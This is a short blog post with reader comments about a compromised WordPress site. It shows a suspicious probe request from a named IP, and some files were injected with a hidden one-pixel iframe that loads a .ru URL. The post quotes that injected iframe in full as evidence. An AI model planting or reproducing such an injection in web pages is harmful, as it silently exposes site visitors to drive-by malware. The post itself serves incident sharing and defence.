sadeferxaa

I’m getting errors in my log file with “sadeferxaa” in the url request:

IP: 92.243.84.187
Page Requested: /index.php?page=sadeferxaa
Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)

WordPress was also compromised with the following data injected at the end of some files:

<html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html>

I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.

Related Posts:

  • No Related Posts
This entry was posted in Tech Tips and tagged . Bookmark the permalink.

3 Responses to sadeferxaa

  1. will says:

    at least for the second part, about the injection of the iframe, it looks like changing the accounts FTP passwords and wordpress secret keys helped prevent that.

  2. andrius says:

    same to me

  3. rajiv says:

    I also got similar strike from same IP addreess [Thu Oct 21 22:00:29 2010] [error] [client 92.243.84.187]

    in/index.php?page=sadeferxaa

Leave a Reply

Your email address will not be published. Required fields are marked *